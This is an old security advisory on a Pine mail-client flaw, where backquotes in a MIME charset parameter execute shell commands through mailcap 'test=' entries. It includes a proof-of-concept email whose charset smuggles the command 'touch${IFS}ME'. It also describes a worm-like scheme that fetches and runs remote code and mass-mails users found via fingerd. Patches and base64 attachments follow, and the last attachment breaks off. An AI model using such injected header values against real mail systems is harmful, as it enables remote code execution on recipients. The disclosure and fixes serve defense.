COMMAND

    pine

SYSTEMS AFFECTED

    Systems running Pine up to v4.10

PROBLEM

    Michal  Zalewski  found  following.   About  few  months  ago,  he
    reported vunerability in metamail package used with pine.  He also
    noticed  that  '`'  character  is  incorrectly  expanded  by pine.
    Problem has been  ignored (probably noone  understood what was  he
    talking about?).  But no matter.  An exception from /etc/mailcap:

	text/plain; shownonascii iso-8859-1 %s; test=test "`echo %{charset} | tr '[A-Z]' '[a-z]'`" = iso-8859-1; copiousoutput

    And  now,  ladies  and  gentelmen  - Michal's old bug, reinvented.
    Usually, above mailcap line is expanded to:

	[...] execve </bin/sh> (sh) (-c) (test "`echo 'US-ASCII' | tr '[A-Z]' '[a-z]'`" = iso-8859-1)

    Hmm, but take a look at this message:

	************************** MIME MESSAGE FOLLOWS **************************
	From: Attacker <attacker@eleet.net>
	To: Victim <victim@somewhere.net>
	Subject: Happy birthday
	...
	MIME-Version: 1.0
	Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319"

	--8323328-235065145-918425607=:319
	Content-Type: TEXT/PLAIN; charset='US-ASCII'

	Make a wish...

	--8323328-235065145-918425607=:319
	Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c"
	Content-Transfer-Encoding: BASE64
	Content-Description: wish
	Content-Disposition: attachment; filename="wish.c"

	...it could be your last.
	*************************** MIME MESSAGE ENDS ***************************

    The result is:

	[...] execve </bin/sh> (sh) (-c) (test "`echo '``touch${IFS}ME``' | tr '[A-Z]' '[a-z]'`" = iso-8859-1)

    ...and arbitrary code ('touch ME', encoded using ${IFS} trick)  is
    executed when message is viewed.

    Elaich Of Hhp found following bigger problem with the charset  bug
    then imagined.   With a uuencode/uudecode  method in the  charset,
    and  an  index.html   of  a  site,   it's  possible  to   run  any
    program/script wanted  to on  the remote  system.   When the email
    is read it  launches lynx -source  and grabs the  index.html which
    is then uudecoded and ran.  This includes root and non-root  users
    infected.  Many big servers run pine, and having fingerd  running,
    most of the time allows  us complete access to get  every username
    on the server, which then is simple to send the infected emails to
    each user.   PHP has tested  this on their  own systems with  full
    success.   These  operating  systems  include  BSD,  Linux,  IRIX,
    AIX, SCO, and SunOS.  hhp-pine.tar is available to download at:

        http://hhp.hemp.net/

SOLUTION

    In  config   there  is   a  FEATURE:   show-plain-text-internally.
    Enabling this feature  causes Pine to  ignore any external  viewer
    settings  and  always  display  text  with Pine's internal viewer.
    So, it  disables the  destructive impact  of the  "feature" found.
    Terence C. Haddock  made a patch.   Same thing can  be applied  to
    Pine 4.04 (the version of  Pine that RedHat 5.2 uses  by default),
    and have made  both a source  and binary RPM  utilizing this patch
    for RedHat 4.2 (libc5) systems, available here:

	http://www.samiam.org/blackdragon

    To apply,  download and  un-tar the  pine 4.10  source.   Copy the
    patch  into  the  pine4.10  directory.   Change  directory  to the
    pine4.10 directory and run patch against it.  This patch fixes the
    hole  in  Zalewski's  post,  it  modifies  mailcap.c.  Pine quotes
    parameters sent to scripts  with single quotes ('),  and correctly
    escapes single quotes within the parameter with the sequence  '\''
    (quote,  slash  quote  quote).  My  patch  makes  it  also  escape
    backquotes (`), replacing them with the sequence '\`'.

    --- pine4.10.orig/pine/mailcap.c        Wed Nov 18 13:00:15 1998
    +++ pine4.10/pine/mailcap.c     Mon Feb  8 09:17:46 1999
    @@ -905,14 +905,18 @@
			 * have to put those outside of the single quotes.
			 * (The parm+1000 nonsense is to protect against
			 * malicious mail trying to overlow our buffer.)
    +                                *
    +                                * TCH - Change 2/8/1999
    +                                * Also quote the ` slash to prevent execution of arbirtrary code
			 */
			for(p = parm; *p && p < parm+1000; p++){
    -                       if(*p == '\''){
    +                       if((*p == '\'')||(*p=='`')){
				*to++ = '\'';  /* closing quote */
				*to++ = '\\';
    -                           *to++ = '\'';  /* below will be opening quote */
    -                       }
    -                       *to++ = *p;
    +                                       *to++ = *p; /* quoted character */
    +                           *to++ = '\'';  /* opening quote */
    +                       } else
    +                               *to++ = *p;
			}

			fs_give((void **) &parm);
    @@ -954,7 +958,7 @@
	  */
	 if(!used_tmp_file && tmp_file)
	   sprintf(to, MC_ADD_TMP, tmp_file);
    -
    +
	 return(cpystr(tmp_20k_buf));
     }

    Pine team believes the following to be true:

     o There is indeed a  vulnerability in the default *mailcap*  file
       distributed with the popular metamail MIME-support package.
     o This same mailcap  file has in the  past been included in  Pine
       distributions as  a sample;  however, this  sample file  is not
       used by Pine unless it is manually installed and renamed.
     o While the metamail package  *can* be used with Pine,  Pine does
       not *require* the installation of metamail.
     o If a site chooses  to install metamail, they should  definitely
       expunge the  dangerous entries  from the  default mailcap file.
       Such a corrected mailcap file is attached.
     o If  correcting  the  system  mailcap  file  is not  immediately
       possible, users  may wish  to set  Pine's "mailcap-search-path"
       variable  to  a  personal  mailcap  file  path.   (See   Pine's
       Main/Setup/Config screen.)
     o Everyone should  beware of offered  workarounds in the  form of
       Pine  patches  that  simply  insert  the shell-escape character
       before any  substituted back-quotes,  as this  only results  in
       moving the problem down one level of shell-nesting.
     o PC-Pine  users are  not vulnerable  to these  dangerous mailcap
       entries.

    While  one  could  modify  Pine  to  guard  against the particular
    exploit permitted by the mailcap  entries in question, it is  very
    difficult to conceive of a  truly safe "paranoid mode" other  than
    disabling parameter substitution  entirely.  However,  PT suspects
    most people will find it  far easier to remove any  unsafe entries
    from their mailcap configuration file.

    --4100290-15032-918699671=:-197051
    Content-Type: TEXT/PLAIN; charset=US-ASCII; name="mailcap.sample"
    Content-Transfer-Encoding: BASE64
    Content-ID: 
    Content-Description:
    Content-Disposition: attachment; filename="mailcap.sample"

    IyBUaGlzIGlzIGEgc2FtcGxlIG1haWxjYXAgZmlsZSBiYXNlZCBvbiB0aGUg
    c2FtcGxlIG1haWxjYXAgZmlsZQ0KIyBjb250YWluZWQgaW4gdGhlIG1ldGFt
    YWlsIGRpc3RyaWJ1dGlvbiAodmVyc2lvbiAyLjcpIGZyb20gQmVsbGNvcmUu
    DQojIFRoaXMgc2FtcGxlIGlzIGZvciBhIFVuaXggc3lzdGVtLiAgTG9vayBh
    dCB0aGUgb3JpZ2luYWwgc2FtcGxlIGZyb20NCiMgdGhlIG1ldGFtYWlsIGRp
    c3RyaWJ1dGlvbiBmb3IgbW9yZSBpZGVhcy4gIFRoaXMgaXMgYSBzaW1wbGlm
    aWVkIHZlcnNpb24NCiMgdG8gZXhwbGFpbiBob3cgaXQgd29ya3Mgd2l0aCBQ
    aW5lLiAgQXMgb2YgT2N0b2JlciwgMTk5NCwgbWV0YW1haWwgd2FzDQojIGF2
    YWlsYWJsZSB2aWEgYW5vbnltb3VzIGZ0cCBmcm9tIHRoZSBob3N0IHRodW1w
    ZXIuYmVsbGNvcmUuY29tIGluIHRoZQ0KIyBmaWxlIC9wdWIvbnNiL21tMi43
    LnRhci5aLg0KIw0KIyBNZXRhbWFpbCBpczoNCiMgQ29weXJpZ2h0IChjKSAx
    OTkxIEJlbGwgQ29tbXVuaWNhdGlvbnMgUmVzZWFyY2gsIEluYy4gKEJlbGxj
    b3JlKQ0KIyANCiMgUGVybWlzc2lvbiB0byB1c2UsIGNvcHksIG1vZGlmeSwg
    YW5kIGRpc3RyaWJ1dGUgdGhpcyBtYXRlcmlhbCANCiMgZm9yIGFueSBwdXJw
    b3NlIGFuZCB3aXRob3V0IGZlZSBpcyBoZXJlYnkgZ3JhbnRlZCwgcHJvdmlk
    ZWQgDQojIHRoYXQgdGhlIGFib3ZlIGNvcHlyaWdodCBub3RpY2UgYW5kIHRo
    aXMgcGVybWlzc2lvbiBub3RpY2UgDQojIGFwcGVhciBpbiBhbGwgY29waWVz
    LCBhbmQgdGhhdCB0aGUgbmFtZSBvZiBCZWxsY29yZSBub3QgYmUgDQojIHVz
    ZWQgaW4gYWR2ZXJ0aXNpbmcgb3IgcHVibGljaXR5IHBlcnRhaW5pbmcgdG8g
    dGhpcyANCiMgbWF0ZXJpYWwgd2l0aG91dCB0aGUgc3BlY2lmaWMsIHByaW9y
    IHdyaXR0ZW4gcGVybWlzc2lvbiANCiMgb2YgYW4gYXV0aG9yaXplZCByZXBy
    ZXNlbnRhdGl2ZSBvZiBCZWxsY29yZS4gIEJFTExDT1JFIA0KIyBNQUtFUyBO
    TyBSRVBSRVNFTlRBVElPTlMgQUJPVVQgVEhFIEFDQ1VSQUNZIE9SIFNVSVRB
    QklMSVRZIA0KIyBPRiBUSElTIE1BVEVSSUFMIEZPUiBBTlkgUFVSUE9TRS4g
    IElUIElTIFBST1ZJREVEICJBUyBJUyIsIA0KIyBXSVRIT1VUIEFOWSBFWFBS
    RVNTIE9SIElNUExJRUQgV0FSUkFOVElFUy4NCiMNCiMgVGhlIG1haWxjYXAg
    dmlld2VycyBhcmUgdXNlZCBieSBQaW5lIHdoZW4gdmlld2luZyBwaWVjZXMg
    b2YgYSBtZXNzYWdlDQojIGZyb20gd2l0aGluIHRoZSBhdHRhY2htZW50IHZp
    ZXdlci4gIFRoYXQgaXMsIHlvdSB0eXBlIHRoZSAiViIgY29tbWFuZA0KIyB3
    aGVuIGFscmVhZHkgdmlld2luZyBhIG1lc3NhZ2UuDQojDQojIFBpbmUgZXhw
    ZWN0cyB0aGUgbWFpbGNhcCBmaWxlIHRvIGJlIGluIC9ldGMvbWFpbGNhcCBv
    biBVbml4IHN5c3RlbXMuDQojIFVzZXJzIG1heSBvdmVycmlkZSBvciBleHRl
    bmQgdGhpcyB3aXRoIGEgLm1haWxjYXAgZmlsZSBpbiB0aGVpciBob21lDQoj
    IGRpcmVjdG9yeS4gIFRoZSBjb250ZW50cyBvZiB0aGF0IHdpbGwgYmUgY29t
    YmluZWQgd2l0aCAvZXRjL21haWxjYXAuDQojIFVzZXJzIG1heSBvdmVycmlk
    ZSB0aGlzIHN0YW5kYXJkIFBpbmUgbWFpbGNhcCBwYXRoDQojICgifi8ubWFp
    bGNhcDovZXRjL21haWxjYXAiKSBieSBkZWZpbmluZyB0aGUgZW52aXJvbm1l
    bnQgdmFyaWFibGUNCiMgTUFJTENBUFMgdG8gYmUgZXF1YWwgdG8gdGhlIGNv
    bG9uIHNlcGFyYXRlZCBwYXRoLg0KIw0KIyBPbiBQQydzIChET1Mgb3IgV2lu
    ZG93cykgdGhlIGZpbGUgTUFJTENBUCBpcyBzZWFyY2hlZCBmb3IgZmlyc3Qg
    aW4gdGhlDQojIHNhbWUgZGlyZWN0b3J5IHdoZXJlIHRoZSB1c2VyJ3MgUElO
    RVJDIGlzIGxvY2F0ZWQgYW5kIHRoZW4gaW4gdGhlIHNhbWUNCiMgZGlyZWN0
    b3J5IHdoZXJlIFBJTkUuRVhFIGlzIGxvY2F0ZWQuICBUaGUgZmlyc3Qgd291
    bGQgYmUgdGhlIHVzZXIncyBwZXJzb25hbA0KIyBvdmVycmlkZSBmaWxlIGFu
    ZCB0aGUgc2Vjb25kIHRoZSBjb21tb24gZmlsZSB1c2VkIGJ5IGFsbCB1c2Vy
    cy4gICBVc2Vycw0KIyBtYXkgb3ZlcnJpZGUgdGhpcyBsb2NhdGlvbiBieSBk
    ZWZpbmluZyB0aGUgZW52aXJvbm1lbnQgdmFyaWFibGUgTUFJTENBUFMNCiMg
    dG8gYmUgZXF1YWwgdG8gdGhlICpzZW1pY29sb24qIHNlcGFyYXRlZCBwYXRo
    Lg0KIw0KIyBQaW5lIGRvZXMgbm90IHVzZSB0aGUgImNvbXBvc2U9IiBwb3J0
    aW9uIG9mIG1haWxjYXAgZW50cmllcyAoYW5kIGRvZXNuJ3QNCiMgcHJvdmlk
    ZSBhIGdlbmVyYWwgbWV0aG9kIG9mIGNvbXBvc2luZyBkaWZmZXJlbnQgdHlw
    ZXMgb2YgbWVzc2FnZXMpLg0KIyBQaW5lIGRvZXNuJ3QgcGF5IGF0dGVudGlv
    biB0byAiY29waW91c291dHB1dCIsIGJ1dCBhbHdheXMgcGlwZXMgdGhlIG91
    dHB1dA0KIyB0byBpdHMgc3RhbmRhcmQgc2Nyb2xsaW5nIHRleHQgd2luZG93
    IGlmICJuZWVkc3Rlcm1pbmFsIiBpcyBub3Qgc2V0Lg0KIyBJZiAibmVlZHN0
    ZXJtaW5hbCIgaXMgc2V0LCB0aGVuIFBpbmUgc2V0cyB0aGUgdGVybWluYWwg
    b3IgdGVybWluYWwgd2luZG93DQojIGJhY2sgdG8gdGhlIHN0YXRlIGl0IHdh
    cyBpbiB3aGVuIFBpbmUgd2FzIHN0YXJ0ZWQgYW5kIGxldHMgdGhlIHZpZXdl
    ciBydW4uDQojIFdoZW4gdGhlIHZpZXdlciBmaW5pc2hlcywgUGluZSByZXNl
    dHMgdGhlIHRlcm1pbmFsIGFuZCByZWRyYXdzIHRoZSBzY3JlZW4uDQojIElm
    IGFueSB1c2VyIGludGVyYWN0aW9uIHdpdGggdGhlIHZpZXdlciBpcyByZXF1
    aXJlZCBhbmQgdGhlIHZpZXdlciBydW5zDQojIGluIHRoZSBzYW1lIHRlcm1p
    bmFsIHdpbmRvdyBhcyBQaW5lLCB0aGVuICJuZWVkc3Rlcm1pbmFsIiBzaG91
    bGQgYmUgc2V0Lg0KIyBUaGUgInRlc3Q9IiBjb21tYW5kcyBhcmUgdXNlZCBh
    cyBkZWZpbmVkIGluIFJGQzE1MjQsIGV4Y2VwdCB0aGF0IHRoZQ0KIyBkYXRh
    IGZpbGUgaXMgbm90IGF2YWlsYWJsZSB0byB0aGUgdGVzdCBjb21tYW5kLg0K
    Iw0KIyBTaW5jZSBtYWlsY2FwIGlzIG9ubHkgdXNlZCBmcm9tIHRoZSBhdHRh
    Y2htZW50IHZpZXdlciwgdGhlIG1lc3NhZ2UgYmVpbmcNCiMgdmlld2VkIHdp
    bGwgYWx3YXlzIGJlIGEgc2luZ2xlIHBhcnQsIHNvICJtdWx0aXBhcnQiIGVu
    dHJpZXMgaW4gbWFpbGNhcCBoYXZlDQojIG5vIGVmZmVjdCBvbiBQaW5lLiAg
    VHlwZSAidGV4dC9wbGFpbiIgd2l0aCAiY2hhcnNldD11c2FzY2lpIiBvciBj
    aGFyc2V0DQojIG1hdGNoaW5nIHRoZSBjaGFyYWN0ZXItc2V0IHZhcmlhYmxl
    IGFyZSBpbnRlcmNlcHRlZCBhbmQgZGlzcGxheWVkIGJ5IFBpbmUNCiMgaW4g
    dGhlIG5vcm1hbCB3YXksIG5vdCBkaXNwbGF5ZWQgYnkgYSBtYWlsY2FwIHZp
    ZXdlci4gIEJlc2lkZXMgdGhvc2UNCiMgZXhjZXB0aW9ucyBqdXN0IGxpc3Rl
    ZCwgYWxsIG90aGVyIHR5cGVzIGFuZCBzdWJ0eXBlcyBhcmUgc3ViamVjdCB0
    bw0KIyBiZWluZyBkaXNwbGF5ZWQgYnkgYSBtYWlsY2FwIHZpZXdlci4gIElm
    IG5vIG1hdGNoIGlzIGZvdW5kIGZvciB0eXBlcyB0ZXh0DQojIG9yIG1lc3Nh
    Z2UsIFBpbmUgd2lsbCBkaXNwbGF5IHRoZW0gaW4gaXRzIHVzdWFsIHdheS4N
    CiMNCiMgQXMgYSBzcGVjaWFsIGNhc2UsIHRoZSAiaW1hZ2Utdmlld2VyIiB2
    YXJpYWJsZSBmcm9tIHRoZSBwaW5lcmMgZmlsZSBpcw0KIyBzdXBwb3J0ZWQg
    YXMgaWYgYW4gZXh0cmEgZW50cnkgZm9yIHR5cGUgaW1hZ2UvKiBjYW1lIGZp
    cnN0IGluIHRoZQ0KIyBwZXJzb25hbCBtYWlsY2FwIGZpbGUuICBUaGF0J3Mg
    Zm9yIGJhY2t3YXJkcyBjb21wYXRpYmlsaXR5Lg0KIw0KIw0KIyBUaGUgZm9s
    bG93aW5nIGxpbmUgY2F1c2VzIHRoZSB4diBwcm9ncmFtIHRvIGJlIHVzZWQg
    dG8gZGlzcGxheSBhbGwNCiMgaW1hZ2UgdHlwZXMgaWYgdGhlIERJU1BMQVkg
    dmFyaWFibGUgaXMgc2V0IChpbmRpY2F0aW5nIHRoZSB1c2VyIGlzDQojIHVz
    aW5nIFgpLiAgKHh2IGlzIHdyaXR0ZW4gYnkgSm9obiBCcmFkbGV5LCBicmFk
    bGV5QGNpcy51cGVubi5lZHUuICBUaGVyZQ0KIyBhcmUgYWxzbyBvdGhlciBY
    IGltYWdlIHZpZXdlciBwcm9ncmFtcyB5b3UgY291bGQgdXNlLCBzdWNoIGFz
    IHhsb2FkaW1hZ2UuKQ0KaW1hZ2UvKjsgeHYgJXM7IHRlc3Q9dGVzdCAtbiAi
    JERJU1BMQVkiDQoNCiMgVGhlIGVmZmVjdCBvZiB0aGUgZm9sbG93aW5nIGlz
    IHRvIHNlbmQgQUxMIGF1ZGlvIHN1YnR5cGVzIHRvIHRoZSANCiMgc2hvd2F1
    ZGlvIHByb2dyYW0uICBJZiBwb3NzaWJsZSwgaXQgd291bGQgYmUgZGVzaXJh
    YmxlIHRvIGFsc28gaW5jbHVkZQ0KIyBhIHRlc3QgY29tbWFuZCB0aGF0IGNv
    dWxkIGRlY2lkZSB3aGV0aGVyIG9yIG5vdCB0aGUgdXNlciBjb3VsZCBwbGF5
    IGF1ZGlvLg0KIyBUaGF0IHdvdWxkIGJlIHNvbWV0aGluZyBsaWtlICJ0ZXN0
    PWNhbl9kb19hdWRpbyAldCIuICAoU2hvd2F1ZGlvIGlzIGEgc2hlbGwNCiMg
    c2NyaXB0IGluY2x1ZGVkIGluIHRoZSBtZXRhbWFpbCBkaXN0cmlidXRpb24u
    KQ0KYXVkaW8vKjsgc2hvd2F1ZGlvICVzDQoNCiMgKFNob3dleHRlcm5hbCBp
    cyBhIHNoZWxsIHNjcmlwdCBpbmNsdWRlZCBpbiB0aGUgbWV0YW1haWwgZGlz
    dHJpYnV0aW9uLikNCm1lc3NhZ2UvZXh0ZXJuYWwtYm9keTsgc2hvd2V4dGVy
    bmFsICVzICV7YWNjZXNzLXR5cGV9ICV7bmFtZX0gXA0KCSV7c2l0ZX0gJXtk
    aXJlY3Rvcnl9ICV7bW9kZX0gJXtzZXJ2ZXJ9OyBcDQoJbmVlZHN0ZXJtaW5h
    bDsgY29tcG9zZXR5cGVkID0gZXh0Y29tcG9zZSAlczsgXA0KCWRlc2NyaXB0
    aW9uPSJBIHJlZmVyZW5jZSB0byBkYXRhIHN0b3JlZCBpbiBhbiBleHRlcm5h
    bCBsb2NhdGlvbiINCg0KIyBJZiB5b3UgaGF2ZSBhbiBpbnRlcmFjdGl2ZSBQ
    b3N0c2NyaXB0IGludGVycHJldGVyLCB5b3Ugc2hvdWxkIHRoaW5rIGNhcmVm
    dWxseSANCiMgYmVmb3JlIHJlcGxhY2luZyBscHIgd2l0aCBpdCBpbiB0aGUg
    Zm9sbG93aW5nIGxpbmUsIGJlY2F1c2UgUG9zdFNjcmlwdA0KIyBjYW4gYmUg
    YW4gZW5vcm1vdXMgc2VjdXJpdHkgaG9sZS4gIEl0IGlzIFJFTEFUSVZFTFkg
    aGFybWxlc3MNCiMgd2hlbiBzZW50IHRvIHRoZSBwcmludGVyLi4uDQphcHBs
    aWNhdGlvbi9wb3N0c2NyaXB0IDsgbHByICVzIFw7IGVjaG8gU0VOVCBGSUxF
    IFRPIFBSSU5URVIgO1wNCiAgICBkZXNjcmlwdGlvbj0iQSBQb3N0c2NyaXB0
    IEZpbGUiOw0KIyB1bnNhZmUgYWx0ZXJuYXRpdmUNCiNhcHBsaWNhdGlvbi9w
    b3N0c2NyaXB0OyBnc3ByZXZpZXcgJXMgOyAgdGVzdD10ZXN0IC1uICIkRElT
    UExBWSINCg0KIyBUaGUgZm9sbG93aW5nIGdpdmVzIHJ1ZGltZW50YXJ5IGNh
    cGFiaWxpdHkgZm9yIHJlY2VpdmluZyANCiMgdGV4dCBtYWlsIGluIHRoZSBJ
    U08tODg1OS0xIGNoYXJhY3RlciBzZXQsIHdoaWNoIGNvdmVycyBtYW55IEV1
    cm9wZWFuIA0KIyBsYW5ndWFnZXMsIGFuZCB0aGUgSVNPLTg4NTktOCBjaGFy
    YWN0ZXIgc2V0LCB3aGljaCBpbmNsdWRlcyBIZWJyZXcNCiMgTm90ZSB0aGF0
    IHRoZSBwaXBlIHRvIHRyIGVuc3VyZXMgdGhhdCB0aGUgIklTTyIgaXMgY2Fz
    ZS1pbnNlbnNpdGl2ZS4NCiMgKFRoaXMgaXMgYWxzbyBmcm9tIG1ldGFtYWls
    LikNCiMNCiMjIyMgSG93ZXZlciwgdGhleSBhcmUgY29tbWVudGVkIG91dCBo
    ZXJlIGFzIHRoZXkgdXNlIGEgInRlc3QiIG1ldGhvZA0KIyMjIyB0aGF0IGNh
    biBjYXVzZSBtYWxpY2lvdXMgZGF0YSBpbiB0aGUgbWVzc2FnZSdzIGNoYXJz
    ZXQgcGFyYW1ldGVyDQojIyMjIHRvIGdldCBleGVjdXRlZC4gIEEgYmV0dGVy
    IGFsdGVybmF0aXZlIHdvdWxkIGJlIHRvIHJlcGxhY2UgdGhlICJ0ZXN0Ig0K
    IyMjIyBjb21tYW5kIHdpdGggYSBzY3JpcHQgdGhhdCBkb2VzIGEgc2FmZXIg
    Y2FzZS1pbnNlbnNpdGl2ZSBjb21wYXJpc29uLg0KI3RleHQvcGxhaW47IHNo
    b3dub25hc2NpaSBpc28tODg1OS04ICVzOyB0ZXN0PXRlc3QgImBlY2hvICV7
    Y2hhcnNldH0gfCB0ciAnW0EtWl0nICdbYS16XSdgIiA9IGlzby04ODU5LTgg
    LWEgLW4gIiRESVNQTEFZIiA7IGNvcGlvdXNvdXRwdXQNCiN0ZXh0L3BsYWlu
    OyBzaG93bm9uYXNjaWkgaXNvLTg4NTktOCAlcyB8IG1vcmUgOyB0ZXN0PXRl
    c3QgImBlY2hvICV7Y2hhcnNldH0gfCB0ciAnW0EtWl0nICdbYS16XSdgIiA9
    IGlzby04ODU5LTg7IG5lZWRzdGVybWluYWwNCiN0ZXh0L3BsYWluOyBzaG93
    bm9uYXNjaWkgaXNvLTg4NTktMSAlczsgdGVzdD10ZXN0ICJgZWNobyAle2No
    YXJzZXR9IHwgdHIgJ1tBLVpdJyAnW2Etel0nYCIgPSBpc28tODg1OS0xIC1h
    IC1uICIkRElTUExBWSIgOyBjb3Bpb3Vzb3V0cHV0DQojdGV4dC9wbGFpbjsg
    c2hvd25vbmFzY2lpIGlzby04ODU5LTEgJXMgfCBtb3JlIDsgdGVzdD10ZXN0
    ICJgZWNobyAle2NoYXJzZXR9IHwgdHIgJ1tBLVpdJyAnW2Etel0nYCIgPSBp
    c28tODg1OS0xIDsgbmVlZHN0ZXJtaW5hbA0KDQojIFRoZSBmb2xsb3dpbmcg
    ZGlzcGxheXMgSmFwYW5lc2UgdGV4dCBhdCBzaXRlcyB3aGVyZQ0KIyB0aGUg
    Imt0ZXJtIiBwcm9ncmFtIGlzIGluc3RhbGxlZDoNCiN0ZXh0L3BsYWluOyBr
    dGVybSAtZ2VvbWV0cnkgKzArMCAtZSBtb3JlICVzIC9kZXYvbnVsbDsgXA0K
    CXRlc3Q9dGVzdCAiYGVjaG8gJXtjaGFyc2V0fSB8IHRyICdbQS1aXScgJ1th
    LXpdJ2AiID0gaXNvLTIwMjItanANCg0KIyBUaGlzIG1hcHMgTVBFRyB2aWRl
    byBkYXRhIHRvIHRoZSB2aWV3ZXIgJ21wZWdfcGxheScuDQojIChNcGVnX3Bs
    YXkgaXMgcGFydCBvZiB0aGUgTVBFRyBkaXN0cmlidXRpb24gZnJvbSBUaGUg
    QmVya2VsZXkgUGxhdGVhdQ0KIyBSZXNlYXJjaCBHcm91cCBhbmQgaXMgYXZh
    aWxhYmxlIHZpYSBhbm9ueW1vdXMgZnRwIGZyb20gdG9lLmNzLmJlcmtlbGV5
    LmVkdS4pDQp2aWRlby9tcGVnOyBtcGVnX3BsYXkgJXMgOyB0ZXN0PXRlc3Qg
    LW4gIiRESVNQTEFZIg0KDQojIFRoaXMgbWFwcyBhbGwgb3RoZXIgdHlwZXMg
    b2YgdmlkZW8gdG8gdGhlIHhhbmltIHZpZXdlci4gIChYYW5pbSBpcyB3cml0
    dGVuDQojIGJ5IE1hcmsgUG9kbGlwZWMsIHBvZGxpcGVjQHdlbGxmbGVldC5j
    b20uKQ0KdmlkZW8vKjsgeGFuaW0gJXMgOyB0ZXN0PXRlc3QgLW4gIiRESVNQ
    TEFZIg0KDQojIFRoZSB4ZHZpIHByb2dyYW0gZGlzcGxheSBUZVggZHZpIGZp
    bGVzIG9uIGFuIFggc2VydmVyLg0KYXBwbGljYXRpb24veC1kdmk7IHhkdmkg
    JXMgOyAgdGVzdD10ZXN0IC1uICIkRElTUExBWSINCg0KIyBUeXBlIG9jdGV0
    LXN0cmVhbSAoYmluYXJ5KSBkYXRhIGNhbiBiZSBkaXNwbGF5ZWQgYXMgYSBo
    ZXggZHVtcCBiZWZvcmUNCiMgeW91IGRlY2lkZSB3aGV0aGVyIG9yIG5vdCB5
    b3Ugd2FudCB0byBzYXZlIGl0IHRvIGEgZmlsZS4gIChIZCBpcyBqdXN0DQoj
    IGEgc3RhbmRhcmQgaGV4IGR1bXAgcHJvZ3JhbS4gIFlvdSBjb3VsZCB1c2Ug
    Im9kIiBpZiB5b3UgZG9uJ3QgaGF2ZSBhbg0KIyAiaGQiLiAgTmFpdmUgdXNl
    cnMgbWF5IGZpbmQgdGhlIG91dHB1dCBmcm9tIHRoaXMgZW50cnkgY29uZnVz
    aW5nLikNCmFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbTsgaGQ7IGNvcGlvdXNv
    dXRwdXQ7IGRlc2NyaXB0aW9uPSJIZXggZHVtcCBvZiBkYXRhIg0K
    --4100290-15032-918699671=:-197051
    Content-Type: TEXT/PLAIN; charset=US-ASCII; name="pine4.10.param.patch"
    Content-Transfer-Encoding: BASE64
    Content-ID: 
    Content-Description:
    Content-Disposition: attachment; filename="pine4.10.param.patch"

    KioqIC4vcGluZS9pbml0LmMub3JpZwlUdWUgSmFuIDI2IDExOjU3OjU2IDE5
    OTkNCi0tLSAuL3BpbmUvaW5pdC5jCVR1ZSBGZWIgIDkgMTk6MjM6MDYgMTk5
    OQ0KKioqKioqKioqKioqKioqDQoqKiogMTc5MSwxNzk2ICoqKioNCi0tLSAx
    NzkxLDE3OTggLS0tLQ0KICAJIEZfUVVFTExfUEFSVElBTF9GRVRDSCwgTk9f
    SEVMUCwgUFJFRl9OT05FfSwNCiAgCXsic2F2ZS1hZ2dyZWdhdGVzLWNvcHkt
    c2VxdWVuY2UiLA0KICAJIEZfQUdHX1NFUV9DT1BZLCBOT19IRUxQLCBQUkVG
    X05PTkV9LA0KKyAJeyJlbmFibGUtbWFpbGNhcC1wYXJhbS1zdWJzdGl0dXRp
    b24iLA0KKyAJIEZfRE9fTUFJTENBUF9QQVJBTV9TVUJTVCwgTk9fSEVMUCwg
    UFJFRl9OT05FfSwNCiAgCXsidGVybWRlZi10YWtlcy1wcmVjZWRlbmNlIiwN
    CiAgCSBGX1RDQVBfV0lOUywgTk9fSEVMUCwgUFJFRl9OT05FfQ0KICAgICAg
    fTsNCioqKiAuL3BpbmUvbWFpbGNhcC5jLm9yaWcJV2VkIE5vdiAxOCAxMDow
    MDoxNSAxOTk4DQotLS0gLi9waW5lL21haWxjYXAuYwlUdWUgRmViICA5IDE5
    OjIzOjQwIDE5OTkNCioqKioqKioqKioqKioqKg0KKioqIDczOSw3NDUgKioq
    Kg0KICAgICAgZHByaW50KDUsIChkZWJ1Z2ZpbGUsICItIG1jX3Bhc3Nlc190
    ZXN0IC1cbiIpKTsNCiAgDQogICAgICBpZihtYy0+dGVzdGNvbW1hbmQgJiYg
    Km1jLT50ZXN0Y29tbWFuZCkNCiEgCWNtZCA9IG1jX2JsZF90ZXN0X2NtZCht
    Yy0+dGVzdGNvbW1hbmQsIHR5cGUsIHN1YnR5cGUsIHBhcmFtcyk7DQogICAg
    ICANCiAgICAgIGlmKCFtYy0+dGVzdGNvbW1hbmQgfHwgIWNtZCB8fCAhKmNt
    ZCl7DQogIAlpZihjbWQpDQotLS0gNzM5LDc0NiAtLS0tDQogICAgICBkcHJp
    bnQoNSwgKGRlYnVnZmlsZSwgIi0gbWNfcGFzc2VzX3Rlc3QgLVxuIikpOw0K
    ICANCiAgICAgIGlmKG1jLT50ZXN0Y29tbWFuZCAmJiAqbWMtPnRlc3Rjb21t
    YW5kKQ0KISAJaWYoIShjbWQgPSBtY19ibGRfdGVzdF9jbWQobWMtPnRlc3Rj
    b21tYW5kLCB0eXBlLCBzdWJ0eXBlLCBwYXJhbXMpKSkNCiEgCSAgcmV0dXJu
    KEZBTFNFKTsJLyogY291bGRuJ3QgYmUgYnVpbHQgKi8NCiAgICAgIA0KICAg
    ICAgaWYoIW1jLT50ZXN0Y29tbWFuZCB8fCAhY21kIHx8ICEqY21kKXsNCiAg
    CWlmKGNtZCkNCioqKioqKioqKioqKioqKg0KKioqIDc5NCw4MDAgKioqKg0K
    ICAgICAgaWYobmVlZHN0ZXJtKQ0KICAgICAgICAqbmVlZHN0ZXJtID0gbWMt
    Pm5lZWRzdGVybWluYWw7DQogIA0KISAgICAgY29tbWFuZCA9IG1jX2NtZF9i
    bGRyKG1jLT5jb21tYW5kLCB0eXBlLCBzdWJ0eXBlLCBwYXJhbXMsIHRtcF9m
    aWxlKTsNCiAgDQogICAgICBkcHJpbnQoNSwgKGRlYnVnZmlsZSwgImJ1aWx0
    IGNvbW1hbmQ6ICVzXG4iLCBjb21tYW5kKSk7DQogIA0KLS0tIDc5NSw4MDIg
    LS0tLQ0KICAgICAgaWYobmVlZHN0ZXJtKQ0KICAgICAgICAqbmVlZHN0ZXJt
    ID0gbWMtPm5lZWRzdGVybWluYWw7DQogIA0KISAgICAgaWYoIShjb21tYW5k
